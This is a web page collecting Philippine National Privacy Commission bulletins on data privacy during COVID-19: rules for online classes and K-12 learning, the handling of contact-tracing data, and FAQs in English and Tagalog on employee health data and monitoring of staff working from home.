The Commission recognizes the efforts of the online/blended/synchronous learning mechanisms with the aim of simulating what is supposed to be happening in an actual physical classroom pre-pandemic, to somehow call to mind a sense of normalcy for education. However, we must be reminded that there is considerable difference in context as learners are at home and that this structure cannot fully compare to what happens in an actual physical classroom.
With this, the Commission had dialogues with regulators such as the Department of Education and Department of the Interior and Local Government, to gather inputs on the actual experiences of learners, educators, schools, and parents since the school year started, to help assess and adequately address the concerns raised in order that learning can be better facilitated.
Taking into account that the conduct of synchronous online classes is considered the best substitute for face-to-face classes based on existing research and studies on the matter, below are the some of the recommended practices which may be implemented:
- Schools should create policies or guidelines on the use of cameras for the conduct of online classes and examinations, as may be reasonable and necessary to supervise and monitor learners and help educators in teaching. Opening of cameras during synchronous learning is not prohibited.
Policies or guidelines should also be considered on the following:
- Encourage the use of virtual backgrounds whenever possible to avoid displaying private living spaces.
- Consider equality and fairness in situations if learners experience technical difficulties, limited internet connection, device malfunctions, glitches on the online platforms and other analogous circumstances, and determine the alternative ways to monitor online classes and examinations in these situations.
- Schools should likewise improve existing student codes of conduct, handbooks, or similar internal policies or rules to adequately regulate student behavior during online classes. Schools must remind learners that the screen capturing, sharing, posting in social media, or any other similar kind of processing of chats, images, videos, and sounds involving their classmates and teachers during online classes may be subject to data privacy and other related regulations.
- Schools should strictly enforce their social media policy. Educators and other school personnel who may have collected personal data in their official capacity and/or during an official school activity must be reminded that the same cannot be used for personal purposes, i.e., posting in their personal social media accounts.
- Online classes may be recorded for purposes of viewing by learners who may have missed a particular class, subject to existing school policies on attendance. The same recording may likewise be used by the school and educators for training purposes. It is best that learners and/or parents and guardians are informed beforehand of this processing activity.
- Submissions of assignments and other school requirements may be done through available online messaging applications on a case-to-case basis, considering the circumstances of the learner and/or educator. But this should be done in a manner where the submissions are sent directly to the appropriate teacher or school personnel and not to be made publicly available.
- Educators and school personnel are reminded that communications involving personal data such as exam grades, results of assignments, report cards, reminders on unpaid school fees, etc. should be sent directly to the concerned recipient/s only and should never be posted in a manner that can be accessed or seen publicly.
- All policies, guidelines, or codes, where the same would involve the processing of personal data, should always adhere to the general data privacy principles of transparency, legitimate purpose, and proportionality. The best interests of the learner shall be of paramount consideration.
-
The above recommendations should be read together with the requirements of existing child protection policies and anti-bullying policies, as necessary and appropriate.
***
- Schools should create policies or guidelines on the use of cameras for the conduct of online classes and examinations, as may be reasonable and necessary to supervise and monitor learners and help educators in teaching. Opening of cameras during synchronous learning is not prohibited.
-
NPC PHE BULLETIN No. 16: Privacy Dos and Don’ts for Online Learning in Public K-12 Classes
Comments Off on NPC PHE BULLETIN No. 16: Privacy Dos and Don’ts for Online Learning in Public K-12 ClassesAs public K-12 classes nationwide are set to open in October, students, parents, guardians, teachers and schools would do well to heed guidelines on online learning that list dos and don’ts aimed at safeguarding sensitive personal information of pupils.
Issued by the Data Privacy Council for the education sector and the National Privacy Commission (NPC), the guidelines cover areas, such as online decorum, learning management systems, online productivity platforms, social media, storage of personal data, webcams and recording videos of discussions, and proctoring.
Listed are the dos and don’ts for online learning in K-12 classes:
For students
DOs- Creating strong passwords when signing up on e-learning platforms. Passwords should be at least 12 characters containing upper- and lower-case letters, numbers, and, if possible, symbols.
- Staying alert during online classes, especially when sharing videos, photos, and files.
- Using customized backgrounds to avoid accidental disclosure of personal information.
- Installing and regularly updating an anti-virus program.
- Muting the microphone and turning off the camera by default, especially when not speaking or reciting.
- Turning off the microphone and camera when leaving one’s station for, say, bathroom breaks.
DON'Ts
- Connecting phones, laptops, and other gadgets to free or public Wi-Fi networks. (In unavoidable circumstances, ensure that the public network has a password and is not accessible to everyone.)
- Sharing submissions for an unlimited time. (When the content no longer needs to be shared, delete it.)
- Sending assignments, projects and other requirements to teachers via social media.
- Taking screenshots of the video feed of teachers and classmates.
- Spamming the chat.</>
- Giving out online links and their passwords to people who should not be in the class.
For parents or legal guardians
DOs- Helping the child or ward check and customize privacy settings of the device or application for online learning.
- Teaching them basic online security (e.g. enabling two-factor authentication and avoiding sharing homework, passwords, and other personal information even with friends).</>
- Taking a moment to peruse the school’s privacy policy.</>
- Ensuring that your consent is obtained for the recording of classes. Consider being present during these sessions, especially if the student is a minor.
DON'Ts
- Leaving the child, especially minors, unsupervised during the conduct of online learning.
For teachers
Teachers must always consider the privacy, equity, & peculiarity among students when conducting online classes:
- Privacy
Students might feel uncomfortable displaying their living space to their peers. Family members might not want their image or video to be captured.
Students might also take a screenshot of their classmate’s video feed, which is prone to cyberbullying and privacy issues. - Equity
Not all students have reliable internet access. Some might have low bandwidth, cannot afford to stream videos, or have limited access to digital devices. - Peculiarity
Some students might feel shy or anxious on camera, affecting their performance in class.
DOs
- Making webcam use optional in online classes.
- Recording online classes as long as it has legitimate uses (e.g. review the lecture presentations and viewing by students who are unable to attend).
- Considering the principles of legitimate interest and proportionality during online proctoring, in which a student’s test duration is monitored using a webcam, microphone, or accessing the student’s screen. Weigh the interests of the students against those of the educational institutions to determine the appropriate balance.
- Obtaining the explicit consent of the student (or parent/legal guardian for minors) before the conduct of online proctoring.
- Letting students decide whether they would turn on the cameras of their devices. They should be permitted to use virtual backgrounds and fun filters.
- Asking questions regularly to assess students’ understanding. Allow them to respond through audio or the videoconferencing app’s chat and features, such as polls and nonverbal actions (e.g. thumbs up), instead of requiring them to turn on their cameras.
DON'Ts
- Posting announcements that involve personal data, such as grades and results of assignments. For example, exam results should be given on an individual basis and not released en masse.
- Allowing students to submit projects and assignments via social media platforms.
- Storing personal data collected as part of the class in a personal account or device.
- Correlating student’s use and eye contact with participation, grading and attendance (e.g. giving students plus points if their cameras are on).
- Removing students from the class or forcing them to turn their cameras on.
For schools
DOs-
- Adopting a particular learning management system (LMS) or online productivity platforms (OPP) where all activities pertaining to online learning should be conducted.
- Ensuring that the LMS or OPP has adequate data protection features.
- Informing students before collection about the personal data to be processed and the reasons using timely, age-appropriate, clear and concise language.
- Exercising caution when integrating apps, supporting tools and other services with an LMS or OPP, as these other services may come with vulnerabilities.
- Being familiar and up to date with all privacy-related trends. This will be of help in crafting data policies that meet the level of protection students need.
- Referring to NPC resources to ensure proper protection of students’ personal data.
- Forming a data breach response team responsible for creating and implementing an incident-response procedure.
- Establishing policies and implementing them effectively to prevent or minimize breaches and to ensure timely discovery of a security breach.
- Conducting and investing in security audits and tests, such as privacy-impact assessment source-code audit, vulnerability assessment and penetration testing.
- Strengthening systems against prominent web attacks.
- A well-structured system, including both the front-end and back-end, ensures the protection of data against common web attacks.
- The vulnerabilities found in the conduct of audits and tests must be fixed first before the system is used further.
- It is important to secure the communication between a user’s browser and the school website site to add another layer of protection to the system.
- Updating systems and their components.
- The security and privacy vulnerabilities yesterday may not be the same today.
- Make a conscious effort to continuously improve or update systems and implement best practices in configuring or hardening them (e.g., database encryption at rest, encryption in transit, network access controls, data access controls and audit logs).
- Install a web application firewall to deter distributed denial of service attacks.
- Backing up data.
- When conducting regular maintenance like a system update, upgrade or configuration, run a full backup of the school website.
-
-
- A full backup must follow the system documentation consistently and obtain a clearance from an accountable officer in the school, such as the Data Protection Officer.
-
-
-
- Online backups are also a convenient way to ensure an accessible copy of the website when the need arises. The “3-2-1” strategy can be used:
-
- 3 total copies of the data
- 2 copies are local but on different mediums
- 1 copy is offsite, which may be geographically separated or in an online cloud computing platform
- Migrating to the cloud is an option.
- Use of cloud computing services reduces capital expenses like housing and maintaining the school’s data centers with servers, storages and other ICT active components.
-
-
- In addition, the cloud eliminates the tedious task of upholding the security of the school infrastructure. The cloud service provider does that for the school.
-
-
- However, keep in mind that proper security and routine maintenance of the web application that runs in the cloud is the school’s full responsibility.
DON'Ts
- Keeping personal data longer than their intended purpose. (Set retention periods and employ mechanisms for frequent purging of messages or interactions between teachers, students and parents.)
-
NPC PHE Bulletin No. 15: Guidelines for Establishments on the Proper Handling of Customer and Visitor Information for Contact Tracing
Comments Off on NPC PHE Bulletin No. 15: Guidelines for Establishments on the Proper Handling of Customer and Visitor Information for Contact TracingPursuant to DTI Memorandum Circular 20-28, s. 2020 (Guidelines to Follow on Minimum Health Protocols for Barbershops and Salons) and DTI Memorandum Circular 20-37, s. 2020 (Guidelines to Follow on Minimum Health Protocols for Dine-in Restaurants and Fastfood Establishments), establishments are required to implement contact tracing measures as one of the mandatory minimum requirements for operation. The National Privacy Commission (NPC) issues this Bulletin to guide establishments on the proper handling and protection of personal data collected from their customers and visitors.
Collect only what is necessaryEstablishments should ensure that the processing of personal data is proportional to the purpose of contact tracing. Collect only such information as required under existing government issuances. Establishments may adopt sample health checklist forms issued by government agencies but should not collect beyond what is required and necessary.
Be transparentEstablishments should inform their customers and visitors of the collection of their personal data and the reasons for such collection. This can be done by posting a privacy notice which is readily visible within the establishment’s premises, such as points of entry, and other conspicuous areas. If the establishment opts to use electronic means, the notice must be posted in the platform prior to collection.
For further information on the processing activity, establishments may direct their customers and visitors to their official websites or social media pages, as well as official websites of pertinent government agencies to provide them with information on the possible uses of their personal data for contact-tracing purposes.
Establishments must ensure that the privacy notice is easy to access, understandable, and uses clear and plain language.
Use information only for the declared purposeAll establishments should use only the personal data collected through health checklists or other similar forms for the purpose of contact-tracing measures. Repurposing the use of data other than contact tracing and storing data for speculative use is not allowed.
Establishments are responsible for reminding their employees and third-party service providers, such as security personnel, that using the collected personal data of customers or visitors for any other purpose is punishable under the Data Privacy Act of 2012 (DPA).
Implement security measuresAll establishments that collect personal information, whether through physical or electronic means, have the obligation to implement reasonable and appropriate safeguards (organizational, physical, and/or technical security measures) to protect the personal data of their customers and visitors against any accidental or unlawful processing, alteration, disclosure, and destruction.
Keep the data only for a limited periodAll personal data collected for the purpose of contact tracing shall be retained only for a period allowed by existing government issuances. After which, all personal data should be disposed of in a secure manner that would prevent further processing and/or unauthorized access or disclosure.
For further information, we may be reached at [email protected].
# # #
-
NPC PHE Bulletin No. 14: Updated Frequently Asked Questions (FAQs) Isinalin sa Wikang Tagalog
Comments Off on NPC PHE Bulletin No. 14: Updated Frequently Asked Questions (FAQs) Isinalin sa Wikang TagalogInilalabas namin ang updated FAQs na ito bilang tugon sa mga isinangguni sa amin ng mga stakeholders ukol sa pag-iingat ng datos sa ilalim ng return-to-work at work-from-home na mga setup sa pagtatrabaho.
Inaasahan na ang mga employer, nasa gobyerno man o pribadong sektor, ay responsable at may buong pananagutan sa pag-proseso ng personal na datos, upang matugunan ang peligro sa pampublikong kalusugan na dulot ng COVID-19. Gayundin, ang mga empleyado nama’y inaasahang makipagtulungan sa makatwiran at marapat na pangongolekta ng kanilang datos upang maibsan ang pagkalat ng COVID-19 at mapanatiling ligtas ang kanilang mga kasamahan sa trabaho, at mga bisita. Sa pangkalahatan, ang aming guidelines ay naglalayon na magtaguyod ng best practices sa ating lugar ng trabaho, na sa ngayon ay sakop na rin ang tahanan ng mga empleyadong work-from-home.
Ang National Privacy Commission ay patuloy na naninindigan na, sa gitna ng hindi pangkaraniwang panahon na ito, ang kalusugan ng lahat ay prayoridad at ang Data Privacy Act ay hindi balakid sa pagsugpo sa COVID-19. Naniniwala kami na ang epektibong gamit sa personal na datos ay susi sa tagumpay natin sa digmaan na ito. Kailangan tayong manatiling mapag-matyag sa labang ito, maingat sa sariling kalusugan, pati na rin sa kalusugan at kaligtasan ng lahat.
RAYMUND ENRIQUEZ LIBORO
Privacy CommissionerSa pagbalik sa trabaho:
- Anong mga uri ng personal na datos ang pwedeng kunin ng employer sa mga empleyado nito? Maaari bang kumuha sila ng health information? Paano ito magagawa na may pagsasa-alang-alang sa privacy?
May lehitimong batayan ang mga employer sa pangongolekta ng karagdagang personal na datos, kabilang ang health information ng mga empleyado habang may pandemya. Ang mga employer ay maaaring kumolekta ng personal na datos na kinakailangan para sa itinakda at lehitimong layunin na makatulong kontrolin ang pagkalat ng virus at mapanatiling ligtas ang mga manggagawa at bibisita sa tanggapan nila. Kahalintulad na mga gabay ay nailabas na rin ng mga kaagapay na sangay ng gobyerno ukol rito: gaya na lamang ng contact tracing rules ng Department of Health, gabay sa pagpapanatiling walang COVID-19 sa mga lugar ng paggawa ng Department of Trade and Industry (DTI) at Department of Labor (DOLE), maging ang gabay sa alternatibong paraan upang makapagtrabaho ng Civil Service Commission (CSC), ang ilan sa mga ito. Ang mga employer ay nararapat na sumangguni sa mga gabay na ito sa paggawa ng kanilang mga polisiya kontra-COVID-19.
Sa pangongolekta at pagproseso ng employee data, kung saan ay kabilang na rin ang health data, ang mga employer ay hinihimok na sundin ang data privacy principles na: transparency, legitimate purpose, at proportionality. Kolektahin lamang ang nararapat ayon sa kailangan upang makamit ang deklaradong layunin nito. Nararapat lang na ang mga employer ay transparent sa kanilang mga empleyado, lalo na sa panahong ito.
Matapos ang koleksyon, dapat pangalagaan mabuti ng mga employer ang seguridad ng mga datos na nakasaad sa pisikal at digital na mga dokumento gaya ng electronic forms, questionnaire sa sintomas, at mga survey form para sa lagay ng kalusugan ng mga empleyado.
Magtakda ng health information policy sa loob ng kumpanya na tumutukoy sa mga sumusunod: pag-alam kung sino ang nararapat magkalap ng impormasyon, sinong makakaalam ng resulta ng health tests, papaano pangangalagaan ang impormasyon, at papaano ipagbibigay-alam ito sa mga awtoridad kung kinakailangan.
- Gaano katagal maaaring itabi ng mga employer ang nakolektang personal na datos?
Maaaring manatili sa pag-iingat ng mga employer ang nakolektang personal na datos ng kanilang mga empleyado hanggang sa panahon na ang layunin sa pagkolekta ay nakamit na, alinsunod na rin sa mga protocols ng mga ahensya ng gobyerno na gagamit sa datos. Matapos makamit ang layunin, ang mga personal datos ay dapat burahin o sirain sa paraan na hindi na muli ito magagamit ng iba, lalo na ng mga ‘di awtorisado.
- Bilang pagpapatupad ng minimum health standards, pwede bang tingnan ng mga employer ang temperatura ng mga empleyado na babalik sa trabaho? Pwede ba tumanggi ang mga empleyado sa ganito?
Oo. Pwede tingnan ng mga employer ang temperatura ng nga empleyadong babalik sa trabaho.
Ayon sa DOH Department Memorandum No. 2020-0220, ang mga empleyado na babalik sa lugar ng kanilang trabaho ay susuriin para sa sintomas ng COVID-19, gaya ng lagnat, ubo, sipon, at iba pang sintomas na may kinalaman sa sakit sa baga. Araw-araw na pagtingin sa temperatura at pagkakaroon ng sintomas para sa lahat ng tauhan na papasok sa trabaho ay bahagi ng pag-iwas at pagpigil sa sakit na ito.
Kung kaya, nararapat na matingnan ang temperatura ng mga empleyadong papasok, alinsunod sa nailabas nang mga tagubilin ng iba’t ibang sangay ng gobyerno. Ang mga empleyado ay dapat makipagtulungan sa kanilang employer upang masiguro ang kaligtasan ng lahat ng babalik sa trabaho. Ang mga employer naman ay inaasahang gumamit ng mga makatwiran na pamamaraan sa pagkolekta ng datos para masiguro ang data privacy, ‘gaya ng pagtuturo sa mga security guard at iba pang tauhan, na huwag isapubliko ang temperatura ng sino man, at maglagay na rin ng protocol sa pagpapatupad ng minimum health standards na nagbibigay puwang din naman ang karapatan at kalayaan ng mga indibidwal.
- Maaari bang tingnan ng mga employer ang travel history at datos na kasama nito?
Oo. Ang travel history ay kasama na sa regular na medical assessment ukol sa COVID-19. Ang mga employer ay maaaring kumolekta ng data ukol dito alinsunod sa pangangailangan at patakaran ng DOH.
- Maaari bang ang mga employer ay magbahagi sa iba ng health information na makokolekta sa mga empleyado? Maaari ba itong gamitin sa ibang layunin? Dapat ba na ipagbigay-alam ang mga impormasyong ito sa mga awtoridad pangkalusugan?
Ang health data ng mga empleyado ukol sa COVID-19 ay pwede lamang ilahad ng employer sa: 1) DOH, 2) mga opisinang awtorisado ng DOH, at 3) mga opisinang awtorisado ng batas; alinsunod sa mga patakaran ukol sa bagay na ito. Ang paggamit ng nakuhang personal na datos ay pwede lamang gamitin sa mga layunin na dineklara sa mga empleyado.
- Pwede bang magtabi ang employer ng kopya ng mga health data na nakalap sa mga empleyado, gaya ng temperatura ng katawan, resulta ng antibody tests, o kaya’y maging ang COVID-19 diagnosis? Gaano katagal naman nila pwede itabi ang mga ito?
Oo. Ang mga kopya ng health data ng empleyado, ‘gaya ng temperatura ng katawan, resulta ng pagsusuri sa antibodies, pati na ang COVID-19 diagnosis, ay maaaring itabi ng employer pansamantala hanggang sa makamit ang layunin sa kanilang koleksyon. Sa panahon na ang mga ito ay nasa pag-iingat ng employer, nararapat na mayroong security measures (organizational, physical, at technical) na ipinatupad ukol dito, upang maiwasan ang ‘di awtorisadong paggamit.
Sa naka-work from home (WFH) setup:
- Pwede bang i-monitor ng employer ang mga empleyado na gumagamit ng mga company-issued devices habang sila ay naka-WFH, sa pamamagitan ng mga monitoring software?
Oo, bilang pagtaguyod sa legitimate interests ng mga employer, pwede silang mag-monitor sa mga empleyado na naka-WFH, subalit sa paraan lamang na balanse, na walang nalalabag na mga karapatan at kalayaan, at alinsunod na rin sa data privacy principles.
Iginigiit namin ang mga tinalakay sa NPC Advisory Opinion No. 2018-084: Ang pag-monitor ng mga aktibidad ng empleyado habang gamit niya ang isang computer na pag-aari ng opisina ay pinapayagan sa ilalim ng DPA, datapwat ang pag-momonitor na ito ay sakop ng isa sa mga criteria ng lawful processing sa ilalim ng Section 12 at/o kaya’y 13 ng batas na ito.
Dapat transparent ang mga employer at abisuhan ang kanilang mga empleyado na napapasailalim sila sa monitoring. Dapat magkaroon ng pagsusuri kung talaga bang kailangan ang ganitong monitoring, hanggang saan ang sakop nito (paraan ng pag-monitor), at kung nakakamit ba ang layunin sa likod nito (halimbawa, para matiyak na produktibo ang mga empleyado). Ipinapayo rin sa mga employer na mag-privacy impact assessment (PIA) sa mga monitoring software na gagamitin para alamin ang peligro sa paggamit nito, at gawan ng paraan na ito’y mapigilan o mabawasan. Dapat magpatupad ang mga employer ng malinaw na mga polisiya na pagbabatayan ng procedures sa pag-monitor.
At isa pa, dapat ikonsidera ng mga employer na may mga pamamaraan ng pag-monitor na hindi gaanong nakakapanghimasok sa privacy ng mga empleyado, at piliin ang mga ito kaysa sa mga paraan na sobra-sobrang datos na ‘di kailangan ang nakakalap, ‘gaya ng pag-rekord sa galaw ng mouse ng computer, pagpindot sa keyboard, random na pagkuha ng screenshots, pagbukas ng webcam para makunan ang empleyado, atbp.
- Maaari bang i-require ng mga employer na naka-video ang mga empleyado habang nasa oras ng paggawa, o lampas pa rito kung sila ay naka-overtime, bilang katibayan ng trabaho sa araw na iyon?
Hindi. Idinidikta ng prinsipyo ng proportionality na dapat ang pagproseso ng impormasyon ay sapat, makabuluhan, naaayon sa sitwasyong kinakailangan, at hindi labis. Ang pagproseso sa personal na datos ay gagawin lamang kung ang layunin ng pagprosesong ito ay ‘di makakamit sa ibang paraan.
Dapat umiwas ang employer sa mga paraan ng pamamahala sa empleyado na sukdulang mapanghimasok sa privacy, lalo pa’t may iba namang paraan upang masiguro na ginagawa nila ang kanilang trabaho.
- Paano masisiguro ng mga employer na ligtas gamitin ang personal data processing systems habang naka-WFH?
Masisiguro ng mga employer na ligtas gamitin ang kanilang personal data processing systems habang nagapapatupad ng WFH setup sa pamamagitan ng pagbibigay sa mga empleyado ng tamang ICT equipment at karampatang gabay o alalay sa paggamit ng mga ito. Napakahalaga rin na ang mga polisiya ng opisina ukol sa proteksyon at privacy ng datos na maayos na ibinabahagi sa mga empleyado.
Partikular sa gobyerno, dapat seguruhin ng mga pinuno ng mga ahensya na ang mga empleyado ay may access o nabigyan ng mga gamit sa komyunikasyon (laptop, computer, internet, telephone, mobile phone, atbp.) upang makapagtrabaho nang maayos.
Maaaring sumangguni sa aming naunang bulletin ukol sa WFH: NPC PHE Bulletin No. 12 na tinalakay ang Protecting Personal Data in a Work From Home Arrangement (https://www.privacy.gov.ph/2020/05/npc-phe-bulletin-no-12-protecting-personal-data-in-a-work-from-home-arrangement/).
Para sa karagdagang impormasyon, maaaring tingnan ang mga sumusunod na issuances:
- National Privacy Commission COVID-19 Bulletins: https://www.privacy.gov.ph/list-of-npc-issuances-related-to-covid-19/
- DOH Memorandum No. 2020-0220 https://www.doh.gov.ph/sites/default/files/health-update/dm2020-0220.pdf
- DOH Department Memorandum No. 2020-0151 https://www.doh.gov.ph/sites/default/files/health-update/dc2020-0174.pdf
- DTI and DOLE Interim Guidelines on Workplace Prevention and Control of COVID-19 https://www.dole.gov.ph/php_assets/uploads/2020/05/DTI_and_DOLE_InterimGuidelinesonWorkplacePreventionandControlofCOVID19__3.pdf
- CSC MC No. 10, s. 2020 http://www.csc.gov.ph/phocadownload/MC2020/MC%20No.%2010,%20s.%202020.pdf
- IATF Omnibus Guidelines on the Implementation of Community Quarantine in the Philippines https://www.officialgazette.gov.ph/downloads/2020/05may/20200515-omnibus-guidelines-on-the-implementation-of-community-quarantine-in-the-philippines.pdf
# # #
- Anong mga uri ng personal na datos ang pwedeng kunin ng employer sa mga empleyado nito? Maaari bang kumuha sila ng health information? Paano ito magagawa na may pagsasa-alang-alang sa privacy?
-
NPC PHE Bulletin No. 14: Updated Frequently Asked Questions (FAQs)
Comments Off on NPC PHE Bulletin No. 14: Updated Frequently Asked Questions (FAQs)We issue the following guidance and response to the updated FAQs raised by stakeholders’ concerns on returning-to-work and current work-from-home arrangements.
We expect employers, whether in the government or the private sector, to process personal data responsibly and with accountability in order to address existing health threats brought by COVID-19. We also expect employees to cooperate to reasonable and appropriate collection of their information to mitigate COVID-19 related risks and keep their co-workers and visitors safe. Overall, our guidelines are intended to produce best practices in the workplace that now extend to the homes of employees working remotely.
The National Privacy Commission (NPC) remains steadfast that in this extraordinary time, public health remains our primary concern and that the Data Privacy Act is not a hindrance to beating COVID-19. It is our view that the effective use of personal data is crucial in winning this battle and recovering in its aftermath. And we must remain vigilant in this fight by being mindful of our own health and the health and safety of others.
RAYMUND ENRIQUEZ LIBORO
Privacy CommissionerOn returning-to-work
- What type/s of personal data can employers collect from employees? Can employers collect health information? How can this be done with the best consideration for privacy?
There is legitimate basis for employers to collect additional personal data that includes health information from employees during the pandemic. Employers may collect personal data that are necessary for a specified and legitimate purpose to help control the spread of the virus and keep their workers and visitors safe. Parallel guidelines have been issued by concerned government agencies in this regard: i.e. contact tracing rules of the Department of Health (DOH), guidelines on COVID-19 prevention in the workplace of the Department of Trade and Industry (DTI) and the Department of Labor (DOLE), or guidelines on alternative work arrangements of the Civil Service Commission (CSC), among others. Employers should refer to these guidelines in coming up with their COVID-19 related policies.
In collecting and processing data from the employees, which shall inevitably include health data, all employers are enjoined to adhere to data privacy principles of: transparency, legitimate purpose and proportionality. Keep collection to the minimum information necessary and use appropriate means to achieve the purpose. It is essential for employers to be transparent with their employees during this time.
Once collected, reasonable and appropriate safeguards should be in place to ensure the security of the physical or electronic forms used, i.e., health symptoms questionnaires or health status survey forms, under the custody of the employer.
Set a health information policy within the company considering the following, among others: determination of who is authorized to gather the information, who should know the results, how to secure the information, and how to disclose it to authorities when necessary.
- How long can employers retain the personal data that they have collected?
Employers may retain the personal data from employees as necessary to fulfill the purpose for which these were collected, pursuant to the protocols of the relevant public authorities. After the fulfillment of such purpose/s, personal data shall be disposed in a secure manner that would prevent any unauthorized processing.
- In keeping with implementing the minimum health standards, can employers regularly check the temperature of employees returning to work? Can employees refuse to have such temperature checks?
Yes. Employers may regularly check the temperature of employees returning to work.
According to the DOH Department Memorandum No. 2020-0220, employees physically reporting to their workplaces shall be screened for COVID-19 symptoms, including fever, cough, colds, and other respiratory symptoms. Daily temperature and symptom monitoring and recording of all staff who will report for work are part of prevention and control measures.
Hence, it is necessary to conduct temperature checks under existing issuances of the various public authorities. Employees should find it reasonable to be screened and must cooperate with their employers to ensure the safety of all returning employees. Employers are expected to use reasonable measures to ensure privacy when doing the collection, like instructing security guards or other personnel to refrain from publicly announcing a person’s temperature results and putting in place protocols to implement minimum health standards mindful of the rights and freedoms of data subjects.
- Can employers continue checking for travel history and data?
Yes. Travel history is now included in usual medical assessments. Employers may collect such data in compliance with the DOH requirements.
- Can employers disclose to other parties the health information collected from employees? Can it be used for other purposes? Can they reveal these data to health authorities?
Any disclosures of employee health data related to COVID-19 must be limited to the 1) DOH, 2) entities authorized by the DOH, and 3) entities authorized by law , following all existing protocols on the matter. Use of collected employee data shall solely be for the specified and declared purpose/s only.
- Can employers retain information collected about employees’ temperature checks, results of antibody testing, and/or COVID-19 diagnosis? How long can they retain such information?
Yes. Temperature checks, results of antibody testing, and/or COVID-19 diagnosis may be retained as necessary to fulfill the purpose for which these were collected, pursuant to the protocols of the relevant public authorities. Retention requires that appropriate security measures (i.e. organizational, physical, and technical) are implemented in order to prevent unlawful processing or unauthorized access by other employees or third parties.
On work from home (WFH):
- Can employers monitor employees during WFH through the installation of monitoring software in company-issued devices?
Yes, employers in exercising their legitimate interest may monitor employees during WFH but should balance it with the rights and freedoms of their employees and adherence to the general data privacy principles. We reiterate the discussions in NPC Advisory Opinion No. 2018-084: monitoring employee activities when he or she is using an office-issued computer may be allowed under the DPA, provided the processing falls under any of the criteria for lawful processing under Sections 12 and/or 13 of the law.
Employers must be transparent to the employees and notify them that they are being monitored. There should be an assessment of the necessity and proportionality of the monitoring (i.e. the method of monitoring) vis-à-vis the objective of the same (i.e. ensuring productivity while under WFH). It is also recommended for the employers to conduct a privacy impact assessment (PIA) of the monitoring software to determine risks and how to mitigate them. Employers should likewise implement clear policies with regard to its monitoring procedures.
Further, less privacy intrusive means of monitoring should be considered rather than excessive and disproportionate mechanism in monitoring such as the use of tracking mouse movements, recording keystrokes, taking random photos of the computer screen, enabling webcams to take a picture of the employee, etc.,
- Can employers require employees to stay on video during business hours or even beyond as when they render overtime work, as proof of work done during the day?
No. The proportionality principle dictates that the processing of information shall be adequate, relevant, suitable, necessary, and not excessive. Personal data shall be processed only if the purpose of the processing could not reasonably be fulfilled by other means. Employers should avoid extreme privacy intrusive means of managing employees as there are other available means of ensuring that employees are doing their assigned tasks.
- How can employers ensure that personal data processing systems being used during WFH are secured?
Employers can secure personal data processing systems being used during WFH by providing proper ICT equipment and support facilities and mechanisms to the employees. More importantly, data protection and privacy policies should be in place to guide the staff.
Specifically, for the government, the heads of agencies shall ensure that employees have access to or is provided with communication equipment or facilities (laptop, computer, internet, telephone, mobile phone, etc.) to carry out their functions.
You may refer to our previous bulletin on WFH: NPC PHE Bulletin No. 12 on Protecting Personal Data in a Work From Home Arrangement (https://www.privacy.gov.ph/2020/05/npc-phe-bulletin-no-12-protecting-personal-data-in-a-work-from-home-arrangement/).
For more information, please refer to the following related issuances:
- National Privacy Commission COVID-19 Bulletins: https://www.privacy.gov.ph/list-of-npc-issuances-related-to-covid-19/
- DOH Memorandum No. 2020-0220 https://www.doh.gov.ph/sites/default/files/health-update/dm2020-0220.pdf
- DOH Department Memorandum No. 2020-0151 https://www.doh.gov.ph/sites/default/files/health-update/dc2020-0174.pdf
- DTI and DOLE Interim Guidelines on Workplace Prevention and Control of COVID-19 https://www.dole.gov.ph/php_assets/uploads/2020/05/DTI_and_DOLE_InterimGuidelinesonWorkplacePreventionandControlofCOVID19__3.pdf
- CSC MC No. 10, s. 2020 http://www.csc.gov.ph/phocadownload/MC2020/MC%20No.%2010,%20s.%202020.pdf
- IATF Omnibus Guidelines on the Implementation of Community Quarantine in the Philippines https://www.officialgazette.gov.ph/downloads/2020/05may/20200515-omnibus-guidelines-on-the-implementation-of-community-quarantine-in-the-philippines.pdf
# # #
- What type/s of personal data can employers collect from employees? Can employers collect health information? How can this be done with the best consideration for privacy?
-
PH to lead global privacy taskforce on COVID-19
Comments Off on PH to lead global privacy taskforce on COVID-19- The National Privacy Commission (NPC) is leading the newly formed COVID-19 taskforce of the Global Privacy Assembly (GPA), instituted to guide 134 jurisdictions around the world in enabling effective government response to the pandemic while continuing to protect citizens’ personal data and privacy.
- Privacy Commissioner Raymund Enriquez Liboro commenced his chairmanship of the taskforce in an inaugural meet last 26 May, coinciding with the Privacy Awareness Week (PAW) 2020.
- “Our aim for this taskforce is to examine current privacy concerns, while finding the right balance between supporting innovation to combat the pandemic and ensuring people’s personal data and information rights are respected. We will draw on the expertise of our membership and stakeholders to provide useful insight on common challenges,” Liboro said.
- The taskforce aims to drive practical responses to privacy issues emerging from the pandemic, as well to assist its membership with insight and best practices. Initially, it will train its focus on two strategic fronts: data protection for contact tracing applications, and privacy in a post-crisis landscape where countries begin to ease their COVID-19 restrictions.
- “We have seen that personal data and technology have become essential in helping governments respond to the COVID-19 pandemic. From contact tracing and disease surveillance applications, to COVID-19 testing as people start going back to the workplace, data protection and privacy have never been more important,” Liboro said.
- In a message, GPA Chair Commissioner Elizabeth Denham thanked Liboro for accepting the new role to lead the taskforce.
- “The Philippines was a great example of a country where the privacy commission had been able to work with national authorities and others in efforts to combat the pandemic, exercising its role as both enabler and protector of citizens’ personal data. As a member of the GPA Executive Committee which had decided on establishment of the Taskforce, Commissioner Liboro was already bringing his customary energy and vision to the new role,” Denham said.
- The taskforce is composed of members from Europe, Asia, North America, the Middle East, Australia and New Zealand. In addition, it also includes international organizations as observers, such as the International Committee of the Red Cross and the Organization for Economic Co-operation and Development.
- Formerly known as the International Conference of Data Protection and Privacy Commissioners (ICDPPC), the Global Privacy Assembly is the premier global forum for data protection and privacy authorities established in 1979.
- Meantime, the NPC marked the celebration of the PAW 2020 in the country with the holding of the 3rd National Data Privacy Conference via a mass video conference last Friday, attended by some 2,000 online participants, many of whom are registered Data Protection Officers.
- Dubbed “Enabling Trust in the New Normal: Reimagining Privacy in the Time of Pandemic,” the live online conference discussed how organizations may retain data subject trust as they adapt to changes under the new normal. This involves the adoption of better defenses against continuing attempts of cyberattacks on the sensitive personal data of the public in the time of pandemic.
# # #
-
NPC PHE Bulletin No. 13: Press Statement of Privacy Commissioner Raymund Eriquez Liboro on the collection of personal data to aid in contact tracing relevant to the COVID-19 response
